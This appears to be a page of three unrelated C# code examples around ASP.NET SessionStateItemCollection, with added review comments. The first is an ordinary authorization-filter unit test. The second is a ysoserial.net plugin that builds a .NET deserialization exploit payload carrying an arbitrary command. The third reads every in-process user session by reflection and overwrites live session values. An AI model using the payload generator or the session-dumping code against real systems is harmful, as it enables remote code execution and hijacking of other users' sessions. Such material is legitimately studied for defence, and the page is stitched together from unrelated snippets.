Exemplo n.º 1
        /// <summary>
        /// Exercises <c>RequireAuthorizationAttribute</c> configured with <c>UserRole.Member</c>:
        /// with no "User" entry in session the filter must set a <c>RedirectResult</c>;
        /// once a <c>UserState</c> is stored under "User" the filter must leave the result null.
        /// </summary>
        /// <remarks>
        /// NOTE(review): only the "no user" and "some user" paths are asserted. A signed-in user
        /// whose role is below the required one, and the redirect target itself, are not checked
        /// by this test.
        /// </remarks>
        public void AuthorizationAttribute_Test()
        {
            // Fake request plumbing; the session collection is kept so a user can be injected later.
            var session = new System.Web.SessionState.SessionStateItemCollection();
            var fakeContext = new FakeControllerContext(
                TestHelper.Resolve<TopicsController>(),
                "http://localhost",
                null,
                null,
                new System.Collections.Specialized.NameValueCollection(),
                new System.Collections.Specialized.NameValueCollection(),
                new System.Web.HttpCookieCollection(),
                session);
            var authContext = new AuthorizationContext(fakeContext, new FakeActionDescriptor());

            // Filter under test, with the login route registered on it.
            var filter = new RequireAuthorizationAttribute(UserRole.Member);
            var loginRoute = new StrictRoute("login", new MvcRouteHandler())
            {
                Url = "login",
                Defaults = new System.Web.Routing.RouteValueDictionary(new
                {
                    controller = "Authentication",
                    action = "Login"
                })
            };
            filter.Routes.Add(loginRoute);

            // Case 1: nothing in session, so the filter is expected to redirect.
            authContext.Result = null;
            filter.OnAuthorization(authContext);
            Assert.IsInstanceOfType(authContext.Result, typeof(RedirectResult));

            // Case 2: a user is present in session, so the filter must not set any result.
            User signedIn = ServicesTests.GetTestUser();
            session["User"] = new UserState(signedIn, AuthenticationProvider.Facebook);
            authContext.Result = null;
            filter.OnAuthorization(authContext);
            Assert.IsNull(authContext.Result);
        }
Exemplo n.º 2
        /// <summary>
        /// Plugin entry point: parses the command line, then builds a byte stream in the wire
        /// format read by <c>SessionStateItemCollection.Deserialize</c> (mode
        /// "sessionstateitemcollection") or <c>HttpStaticObjectsCollection.Deserialize</c>
        /// (every other mode value), carrying a gadget built from <c>inputArgs</c>.
        /// </summary>
        /// <param name="args">Raw plugin arguments, handed to <c>options.Parse</c>.</param>
        /// <returns>The serialized stream as a <c>byte[]</c>, boxed as <c>object</c>.</returns>
        /// <remarks>
        /// The process exits with code -1 when option parsing throws <c>OptionException</c> or when
        /// <c>command</c> is null, empty or whitespace.
        /// Defensive reading: both readers end up handing the embedded object to the type-20 branch
        /// of <c>AltSerialization.ReadValueFromStream</c> (see the inline comments), so any store
        /// that feeds bytes to these <c>Deserialize</c> methods has to be writable only by trusted
        /// code.
        /// </remarks>
        public object Run(string[] args)
        {
            InputArgs     inputArgs = new InputArgs();
            List <string> extra; // assigned by options.Parse below but never read in this method

            try
            {
                // command, minify, useSimpleType and test are not declared in this method;
                // presumably they are fields filled in by options.Parse - confirm against the class.
                extra                   = options.Parse(args);
                inputArgs.Cmd           = command;
                inputArgs.Minify        = minify;
                inputArgs.UseSimpleType = useSimpleType;
                inputArgs.Test          = test;
            }
            catch (OptionException e)
            {
                Console.Write("ysoserial: ");
                Console.WriteLine(e.Message);
                Console.WriteLine("Try 'ysoserial -p " + Name() + " --help' for more information.");
                System.Environment.Exit(-1);
            }

            object payload = "";

            // IsNullOrWhiteSpace already covers null and empty; the IsNullOrEmpty call is redundant.
            if (String.IsNullOrEmpty(command) || String.IsNullOrWhiteSpace(command))
            {
                Console.Write("ysoserial: ");
                Console.WriteLine("Incorrect plugin mode/arguments combination");
                Console.WriteLine("Try 'ysoserial -p " + Name() + " --help' for more information.");
                System.Environment.Exit(-1);
            }

            // NOTE(review): ToLower() is culture-sensitive, so under a culture with special casing
            // for 'I' (e.g. tr-TR) an upper-case mode value would not match; it also throws if mode
            // is null. An ordinal, case-insensitive comparison would avoid both.
            if (mode.ToLower().Equals("sessionstateitemcollection"))
            {
                /* I decided to change the TypeConfuseDelegateGenerator class and use its gadget instead of doing this through the following hacky way */

                /* hacky way begin
                 * byte[] tempPayload_init = (byte[])new TypeConfuseDelegateGenerator().GenerateWithNoTest("BinaryFormatter", inputArgs);
                 * byte[] tempPayload = new byte[tempPayload_init.Length + 1]; // adding one byte initially to fix the length problem
                 * tempPayload_init.CopyTo(tempPayload, 0);
                 * System.Web.SessionState.SessionStateItemCollection items = new System.Web.SessionState.SessionStateItemCollection();
                 * items[""] = tempPayload;
                 * MemoryStream stream = new MemoryStream();
                 * BinaryWriter writer = new BinaryWriter(stream);
                 * items.Serialize(writer);
                 * stream.Flush();
                 * tempPayload = stream.ToArray();
                 * byte[] newSerializedData = new byte[tempPayload.Length-27-1-1]; // yes don't ask about the numbers! it's magical!
                 * Array.Copy(tempPayload, 0, newSerializedData, 0, 9); // reading first 9 bytes
                 * Array.Copy(tempPayload, 36, newSerializedData, 9, tempPayload.Length-27-1-9-1); // ignoring 27 bytes after 9 bytes + reading the rest + ignoring the last byte
                 * newSerializedData[13] = 20; // for ReadByte - 20 is the type that will be deserialized in AltSerialization.ReadValueFromStream
                 * // hacky way ends */

                /* here it is using the sane way! */
                // The gadget object is stored as the single item (empty-string key) of a real
                // SessionStateItemCollection, and the collection's own Serialize writes the stream.
                object serializedData = (object)TypeConfuseDelegateGenerator.TypeConfuseDelegateGadget(inputArgs);
                System.Web.SessionState.SessionStateItemCollection items = new System.Web.SessionState.SessionStateItemCollection();
                items[""] = serializedData;
                // NOTE(review): stream and writer are never disposed in this branch.
                MemoryStream stream = new MemoryStream();
                BinaryWriter writer = new BinaryWriter(stream);
                items.Serialize(writer);
                stream.Flush();
                payload = stream.ToArray();

                if (test)
                {
                    // PoC on how it works in practice
                    // Reads the bytes back in this process; presumably this fires the gadget
                    // locally, so the command in inputArgs.Cmd would run on the machine running
                    // the tool. Unlike the else branch there is no try/catch here, so an exception
                    // raised during deserialization propagates to the caller.
                    // The local named 'test' declared below hides the outer 'test' used in the
                    // if-condition for the rest of this block.
                    stream = new MemoryStream((byte[])payload);
                    BinaryReader binReader = new BinaryReader(stream);
                    System.Web.SessionState.SessionStateItemCollection test = System.Web.SessionState.SessionStateItemCollection.Deserialize(binReader);
                    test.GetEnumerator();
                }
            }
            else
            {
                // HttpStaticObjectsCollection
                // NOTE(review): every mode value other than "sessionstateitemcollection" lands
                // here; unknown values are not rejected.
                // A 7-byte header is put in front of the generator output. Bytes 1-4 are left at
                // zero; byte 4 is presumably the length prefix of an empty ReadString - confirm.
                byte[] serializedData    = (byte[])new TextFormattingRunPropertiesGenerator().GenerateWithNoTest("BinaryFormatter", inputArgs);
                byte[] newSerializedData = new byte[serializedData.Length + 7]; // ReadInt32 + ReadString + ReadBoolean + ReadByte
                serializedData.CopyTo(newSerializedData, 7);
                newSerializedData[0] = 1;                                       // for ReadInt32
                newSerializedData[5] = 1;                                       // for ReadBoolean
                newSerializedData[6] = 20;                                      // for ReadByte - 20 is the type that will be deserialized in AltSerialization.ReadValueFromStream

                payload = newSerializedData;

                if (test)
                {
                    // PoC on how it works in practice
                    // Same in-process read-back as the other branch; here exceptions are caught
                    // and passed to Debugging.ShowErrors instead of propagating.
                    try {
                        MemoryStream stream    = new MemoryStream((byte[])payload);
                        BinaryReader binReader = new BinaryReader(stream);
                        System.Web.HttpStaticObjectsCollection test = System.Web.HttpStaticObjectsCollection.Deserialize(binReader);
                    }
                    catch (Exception err)
                    {
                        Debugging.ShowErrors(inputArgs, err);
                    }
                }
            }

            return(payload);
        }
Exemplo n.º 3
        GetActiveSessions(System.Web.HttpContext context)
        {
            // Purpose: walks the non-public cache behind System.Web.HttpRuntime via reflection,
            // picks out every entry whose value is an InProcSessionState, and returns the session
            // items found, grouped per internal cache (outer key = cache index, optionally
            // followed by ": " and a session id).
            //
            // NOTE(review), security: the result contains the session contents of every in-process
            // session reachable this way, not only the caller's. Whatever exposes this method has
            // to restrict it to trusted operators and avoid logging or rendering the values.
            //
            // NOTE(review), side effect: this is not a read-only dump. The loop over sess.Keys
            // further down overwrites values in every live session with whatever
            // KeyValuePairs(context) returned for the same key.
            //
            // NOTE(review), robustness: every GetProperty/GetField result is dereferenced without
            // a null check (only the "Key" lookup is guarded), so a runtime whose internals lack
            // "CacheInternal", "_caches", "_entries", "Value" or "_sessionItems" fails here with a
            // NullReferenceException.

            // Dictionary(Of String, Object) 'List(Of SessionStateItemCollection)
            // Dim lsSessionStates As New List(Of SessionStateItemCollection)


            // int strLcId = System.Web.HttpContext.Current.Session.LCID;
            // string strSeId = System.Web.HttpContext.Current.Session.SessionID;

            // System.Console.WriteLine(strLcId);
            // System.Console.WriteLine(strSeId);


            System.Collections.Generic.Dictionary <string, System.Collections.Generic.Dictionary <string, object> >
            dictAllSession = new System.Collections.Generic
                             .Dictionary <string, System.Collections.Generic.Dictionary <string, object> >();



            //System.Web.Caching.CacheMultiple
            // Static, non-public property; the concrete type in the comment above is the
            // original author's note and is not verifiable from this code.
            object obj = typeof(System.Web.HttpRuntime)
                         .GetProperty("CacheInternal", BindingFlags.NonPublic | BindingFlags.Static)
                         .GetValue(null, null);

            // List(Of System.Web.Caching.CacheSingle)
            object[] obj2 = (object[])obj.GetType().GetField("_caches", BindingFlags.NonPublic | BindingFlags.Instance)
                            .GetValue(obj);


            // Key/value pairs derived from the current request by a helper defined elsewhere;
            // what they contain and whether they are caller-controlled cannot be told from here.
            System.Collections.Generic.Dictionary <string, string> tD = KeyValuePairs(context);


            for (int i = 0; i < obj2.Length; i++)
            {
                System.Collections.Hashtable c2 = (System.Collections.Hashtable)obj2[i].GetType()
                                                  .GetField("_entries", BindingFlags.NonPublic | BindingFlags.Instance)
                                                  .GetValue(obj2[i]);

                // One dictionary and one id per cache, not per session: when a cache holds several
                // sessions their items are merged into dictSession (a later session overwrites an
                // earlier one on equal keys) and strSessionId keeps the last id read.
                System.Collections.Generic.Dictionary <string, object> dictSession =
                    new System.Collections.Generic.Dictionary <string, object>();

                string strSessionId = null;


                foreach (System.Collections.DictionaryEntry entry in c2)
                {
                    // NOTE(review): o1 is dereferenced on the next line without a null check.
                    object o1 = entry.Value.GetType().GetProperty("Value", BindingFlags.NonPublic | BindingFlags.Instance)
                                .GetValue(entry.Value, null);
                    // Session entries are recognised by runtime type name, since the type is not public.
                    if (o1.GetType().ToString() == "System.Web.SessionState.InProcSessionState")
                    {
                        System.Web.SessionState.SessionStateItemCollection sess =
                            (System.Web.SessionState.SessionStateItemCollection)
                            o1.GetType().GetField("_sessionItems", BindingFlags.NonPublic | BindingFlags.Instance)
                            .GetValue(o1);

                        if (sess != null)
                        {
                            // yield Return sess
                            // lsSessionStates.Add(sess)

                            System.Type tKeyType = entry.Key.GetType();



                            // System.Reflection.PropertyInfo[] pis  = tKeyType.GetProperties(BindingFlags.NonPublic | BindingFlags.Instance);
                            // System.Reflection.FieldInfo[] fis  = tKeyType.GetFields(BindingFlags.NonPublic | BindingFlags.Instance);


                            // System.Reflection.FieldInfo fi = tKeyType.GetField("Key");
                            // The only guarded lookup: a missing "Key" property just leaves the id unset.
                            System.Reflection.PropertyInfo pi = tKeyType.GetProperty("Key", BindingFlags.NonPublic | BindingFlags.Instance);
                            if (pi != null)
                            {
                                strSessionId = System.Convert.ToString(pi.GetValue(entry.Key, null));
                            }

                            // string str = (string) entry.Key.GetType().GetProperty("Key").GetValue(entry.Key, null);

                            // Writes into the live session object: every existing session key that
                            // also appears in tD has its value replaced by the string from tD.
                            for (int tC = 0; tC <= sess.Keys.Count - 1; tC++)
                            {
                                if (tD.ContainsKey(sess.Keys[tC]))
                                {
                                    sess[sess.Keys[tC]] = tD[sess.Keys[tC]];
                                }
                            }


                            // Copy the (possibly just overwritten) items into the per-cache result.
                            foreach (string tKey in sess.Keys)
                            {
                                // dictSession.Add(i.ToString() + "-" + tKey, sess[tKey]); ' WTF ???
                                dictSession[tKey] = sess[tKey];
                            }
                        }
                    }
                }

                // The cache index always leads the outer key, which keeps the Add below from
                // colliding; a cache without any session still gets an (empty) entry.
                if (string.IsNullOrEmpty(strSessionId))
                {
                    strSessionId = i.ToString();
                }
                else
                {
                    strSessionId = i.ToString() + ": " + strSessionId;
                }

                dictAllSession.Add(strSessionId, dictSession);
            }

            return(dictAllSession); // dictSession 'lsSessionStates
        } // GetActiveSessions